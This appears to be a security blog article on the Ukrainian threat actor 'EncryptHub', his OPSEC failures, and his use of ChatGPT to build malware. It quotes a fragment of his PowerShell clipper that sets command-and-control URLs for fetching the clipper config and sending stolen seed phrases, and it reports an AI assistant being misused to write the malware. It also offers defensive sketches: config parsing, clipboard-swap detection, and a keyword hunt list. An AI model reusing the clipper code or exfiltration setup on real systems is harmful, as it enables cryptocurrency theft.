Physical Address
Lesya Kurbasa 7B
03194 Kyiv, Kyivska obl, Ukraine
In a remarkable turn of events that highlights both the evolving tactics of modern cybercriminals and the fundamental importance of operational security, a Ukrainian threat actor operating under the alias “EncryptHub” has been exposed after a series of operational security failures and unconventional use of AI tools.
This case presents a fascinating study in how even technically proficient attackers can be undone by basic OPSEC mistakes, while simultaneously showcasing how AI tools like ChatGPT are increasingly being leveraged to develop sophisticated malware.
According to research from Outpost24’s KrakenLabs team, EncryptHub is a Ukrainian cybercriminal who fled his hometown approximately a decade ago. Since early 2024, he has been orchestrating increasingly sophisticated ransomware campaigns targeting organizations worldwide with custom-built malware designed to steal cryptocurrency and sensitive information.
What makes this threat actor particularly interesting is the dichotomy of his activities. While conducting malicious campaigns, he simultaneously contributed to legitimate security research, even receiving acknowledgment from Microsoft Security Response Center for discovering CVE-2025-24071 and CVE-2025-24061.
This dual nature is reminiscent of patterns we’ve seen with other threat actors who oscillate between legitimate security research and cybercrime, similar to the behavior documented among the Emotet operators before they fully committed to criminal activity.
Despite his technical sophistication in malware development, EncryptHub made a catastrophic series of operational security failures that ultimately led to his unmasking.
Source: Security researchers’ analysis of EncryptHub case, Outpost24’s KrakenLabs, 2024
The initial breakthrough came when KrakenLabs researchers discovered an exposed JSON configuration file on EncryptHub’s command and control server. This file contained Telegram bot information that provided investigators with a digital trail leading directly to the threat actor’s activities.
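To illustrate why such an exposure is so damaging, the sketch below parses a leaked bot configuration of the kind described and shows how an investigator could pivot from it. The file layout, field names, and token are hypothetical, not the actual EncryptHub artifact:

```python
import json

# Hypothetical example of a leaked Telegram bot config -- the field
# names and token below are invented for illustration, not the real file.
leaked_config = '''
{
    "bot_token": "1234567890:AAExampleExampleExampleExample",
    "chat_id": "-100987654321",
    "build_tag": "clipper_build_01"
}
'''

def pivot_points(raw_json: str) -> dict:
    """Extract the identifiers an investigator can pivot on.

    A leaked bot token lets researchers query Telegram's public Bot API
    (for example the getMe method) to identify the bot account, and the
    chat_id points at the channel receiving stolen data.
    """
    cfg = json.loads(raw_json)
    token = cfg["bot_token"]
    return {
        "bot_token": token,
        "chat_id": cfg["chat_id"],
        # URL an analyst would query to identify the bot (not called here)
        "getme_url": f"https://api.telegram.org/bot{token}/getMe",
    }

pivots = pivot_points(leaked_config)
print(pivots["getme_url"])
```

`getMe` is a real Telegram Bot API method that returns the bot’s account details, which is precisely how a leaked token turns into an attribution lead.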
Perhaps the most fascinating aspect of this case is EncryptHub’s extensive reliance on ChatGPT as a “partner in crime.” The AI assistant was used to create nearly every component of his malicious infrastructure.
Source: Analysis of recovered ChatGPT conversation logs, Outpost24 KrakenLabs, 2024
In one particularly revealing conversation, EncryptHub asked the AI to evaluate whether he was better suited to be a “black hat or white hat” hacker, even confessing to criminal activities and exploits he had developed.
The clipper malware developed with ChatGPT’s assistance represents one of EncryptHub’s primary attack vectors. This PowerShell-based malware was designed to monitor clipboards for cryptocurrency wallet addresses and replace them with attacker-controlled alternatives – a technique similar to what we’ve observed in TrickBot campaigns targeting financial institutions.
The code demonstrates how the malware loads wallet configurations from a remote server and operates continuously to intercept transactions:
```powershell
# API URLs for fetching the clipper config and exfiltrating seed phrases
# (the C2 domain is truncated in the published excerpt)
$serverConfigUrl = "https://[...]/admin/clipper/config"
$serverSendSeedUrl = "https://[...]/admin/clipper/send_seed"

# Retrieve the victim's public IP address
function Get-PublicIP {
    try {
        $response = Invoke-RestMethod -Uri "https://api64.ipify.org?format=json" -ErrorAction Stop
        return $response.ip
    }
    catch {
        return $null
    }
}
```
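On the defensive side, the same logic can be inverted: endpoint tooling can flag the moment clipboard contents that look like a wallet address silently change to a different address. Below is a minimal sketch of that check; the regexes, sample values, and function names are illustrative (assuming Bitcoin legacy and Ethereum address formats), not taken from the EncryptHub samples:

```python
import re

# Simplified patterns for two common address formats (illustrative only):
# Bitcoin legacy (Base58, starts with 1 or 3) and Ethereum (0x + 40 hex chars).
ADDRESS_PATTERNS = [
    re.compile(r"^[13][a-km-zA-HJ-NP-Z1-9]{25,34}$"),  # BTC legacy
    re.compile(r"^0x[a-fA-F0-9]{40}$"),                # ETH
]

def is_wallet_address(text: str) -> bool:
    return any(p.match(text) for p in ADDRESS_PATTERNS)

def looks_like_clipper_swap(copied: str, current: str) -> bool:
    """True if the clipboard held one wallet address and now holds another.

    A legitimate user action replaces the clipboard with arbitrary text;
    a clipper replaces one valid address with a *different* valid address,
    which is exactly the pattern checked here.
    """
    return (
        is_wallet_address(copied)
        and is_wallet_address(current)
        and copied != current
    )

# Simulated events: the user copied one ETH address, but the clipboard now
# holds another -- the signature of a clipper at work.
user_copied = "0x" + "ab" * 20
now_in_clipboard = "0x" + "cd" * 20
print(looks_like_clipper_swap(user_copied, now_in_clipboard))  # True
```

A real monitor would hook clipboard-change events via OS APIs; the point here is only the swap heuristic itself.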
The EncryptHub case highlights a growing trend where AI tools serve as both a weapon for cybercriminals and a tool for defenders. While AI can help automate security tasks and identify threats, it can also be misused to create more sophisticated attack vectors.
Source: Industry analysis on AI usage in cybersecurity, based on Microsoft research, 2023
According to a Microsoft Security report, there’s an emerging “AI cybercrime economy” in which threat actors use large language models to accelerate malware development, refine phishing lures, and automate reconnaissance.
What’s particularly concerning is that these AI-assisted attacks often combine traditional techniques with new capabilities, making them potentially more dangerous than conventional threats. For example, the cryptocurrency clipboard hijacking technique used by EncryptHub has been observed in previous campaigns, but AI assistance allowed for more sophisticated code that could better evade detection.
This technology-driven evolution of malware is also evident in other ransomware families. While EncryptHub used AI-assisted development to create sophisticated attacks, more established criminal groups are taking different approaches. For instance, LockBit 4.0 Ransomware represents the culmination of years of traditional ransomware development, completely rewritten in Rust for improved performance, with multi-threaded encryption capabilities that make it particularly devastating to organizations without proper defenses.
Organizations should be on alert for indicators associated with EncryptHub, in particular PowerShell scripts that monitor the clipboard and outbound requests to clipper configuration and seed-exfiltration endpoints like those in the sample above.
This attack methodology shows similarities to Dofoil trojan campaigns, which also focused on cryptocurrency theft through sophisticated system manipulation.
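One practical way to hunt for this class of tradecraft is to scan PowerShell script-block logs for the combination of clipboard access and outbound HTTP calls. The sketch below shows the idea; the keyword lists and sample log lines are invented heuristics, not a detection rule from the EncryptHub report:

```python
# Heuristic hunt over PowerShell script-block log text: a script that both
# reads the clipboard and makes web requests deserves a closer look.
# Marker lists and sample logs are invented for illustration.
CLIPBOARD_MARKERS = ("Get-Clipboard", "Set-Clipboard", "Windows.Forms.Clipboard")
NETWORK_MARKERS = ("Invoke-RestMethod", "Invoke-WebRequest", "Net.WebClient")

def is_suspicious(script_block: str) -> bool:
    """Flag script blocks that combine clipboard access with network I/O."""
    has_clip = any(m in script_block for m in CLIPBOARD_MARKERS)
    has_net = any(m in script_block for m in NETWORK_MARKERS)
    return has_clip and has_net

sample_logs = [
    # Benign: only fetches a URL
    "Invoke-WebRequest -Uri https://example.com/update.json",
    # Clipper-like: watches the clipboard and phones home
    "while ($true) { $c = Get-Clipboard; Invoke-RestMethod -Uri $u -Body $c }",
]

for line in sample_logs:
    print(is_suspicious(line), line[:50])
```

Keyword matching like this is noisy on its own; in practice it would feed a SIEM rule that correlates the hit with process lineage and destination reputation.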
The EncryptHub case offers valuable lessons for cybersecurity professionals, and a preview of what they will increasingly face in the coming years: technically sophisticated attacks assisted by AI, deployed by threat actors who may simultaneously operate in both legitimate and criminal spheres.
While new tools like AI assistants create powerful capabilities for attackers, the fundamentals of cybersecurity and investigation remain unchanged. Basic OPSEC mistakes still undo even the most technically proficient adversaries, reinforcing the importance of security fundamentals for both attackers and defenders.
As cybercriminals continue to embrace AI tools, security teams must adapt their detection and prevention strategies accordingly, while remaining vigilant for the human errors that often provide the critical breakthrough in exposing malicious activities.